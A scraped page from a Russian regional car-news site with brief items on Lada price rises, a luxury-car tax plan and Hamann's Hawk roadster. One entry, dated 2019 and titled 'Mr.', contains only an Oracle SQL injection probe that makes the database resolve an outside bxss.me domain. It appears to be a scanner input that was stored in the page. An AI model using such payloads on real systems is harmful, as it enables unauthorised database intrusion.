Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
2 декабря 2008г.
ВАЗы будут дорожать, несмотря на кризис

В то время как большинство иностранных автопроизводителей борется с негативными последствиями экономического кризиса путем снижения цен, «АВТОВАЗ» заявляет, что все автомобили Lada подорожают с нового года на 2-3 %. Представители «АВТОВАЗа» объясняют повышение цен «конъюнктурой рынка» и не ожидают падения спроса на Lada, сообщают «Ведомости».
Подробнее »
30 августа 2019г.
Mr.

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41388.529.a9e86.1.bxss'||'.me')
Подробнее »
12 декабря 2012г.
Налог на роскошные авто могут привязать к их маркам

Минфин РФ готов реализовать поручение главы государства по введению налога на роскошь и не исключает, что критерием для налогообложения роскошных автомобилей станет марка или первоначальная продажная цена, а не мощность двигателя, как предлагалось ранее.
Подробнее »
В Женеве представлят родстер Hawk на базе Mercedes-Benz SLS AMG
Немецкое тюнинг-ателье Hamann покажет на автосалоне в Женеве родстер Hawk, созданный на базе Mercedes-Benz SLS AMG. Стоит отметить, что компания не в первый раз работает с данной моделью Mercedes-Benz: ровно год назад она представила в Женеве купе Hawk на базе SLS AMG. Хотя родстер, естественно, не унаследовал от купе двери-«крылья», модель от Hamann сохранила «птичье» название. «Ястреб» прошел тесты в аэродинамической трубе и показал впечатляющие результаты. Он получил модифицированный бампер, карбоновый капот с воздухозаборниками, аэродинамический обвес, задний диффузер и заднее крыло из карбона.

Под его капотом размещен 6,3-литровый двигатель V8 с новой электронной системой контроля. Его мощность составляет 628 л.с. (против 563 л.с. до модификации). Благодаря заниженному на 30 мм центру гравитации, ультра-легким кованым колесным дискам, которые являются собственной разработкой Hamann, уменьшенному весу и улучшенным аэродинамическим показателям родстер Hawk способен разгоняться с нуля до 100 км/ч за 3,6 секунды, а его максимальная скорость составляет 320 км/ч.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика